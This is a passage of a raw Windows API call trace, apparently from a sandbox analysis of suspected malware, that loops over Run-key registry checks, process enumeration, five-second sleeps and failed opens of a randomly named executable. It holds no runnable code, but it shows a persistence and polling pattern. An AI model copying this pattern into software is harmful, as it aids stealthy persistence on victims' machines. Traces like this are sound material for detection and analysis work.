RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0250.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0250.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0250.770] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0250.775] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0250.775] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0250.775] NtClose (Handle=0x14c) returned 0x0 [0250.775] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.775] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.775] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.775] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.775] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.775] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0250.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0250.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0250.896] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0250.898] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0250.898] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0250.898] NtClose (Handle=0x14c) returned 0x0 [0250.899] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.899] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.899] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.899] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.899] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.899] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0250.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0250.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0250.999] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0251.007] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0251.007] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0251.007] NtClose (Handle=0x14c) returned 0x0 [0251.008] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.008] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.008] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.008] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.008] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.008] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0251.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0251.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0251.120] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0251.132] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0251.133] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0251.133] NtClose (Handle=0x14c) returned 0x0 [0251.133] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.133] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.133] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.133] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.133] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.133] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0251.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0251.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0251.232] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0251.242] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0251.242] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0251.242] NtClose (Handle=0x14c) returned 0x0 [0251.242] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.242] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.242] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.242] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.243] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.243] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0251.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0251.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0251.325] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0251.336] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0251.336] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0251.336] NtClose (Handle=0x14c) returned 0x0 [0251.336] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.336] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.336] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.336] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.336] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.336] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0251.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0251.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0251.484] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0251.491] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0251.491] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0251.491] NtClose (Handle=0x14c) returned 0x0 [0251.491] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.491] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.491] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.491] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.492] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.492] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0251.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0251.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0251.576] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0251.585] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0251.585] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0251.585] NtClose (Handle=0x14c) returned 0x0 [0251.585] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.585] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, 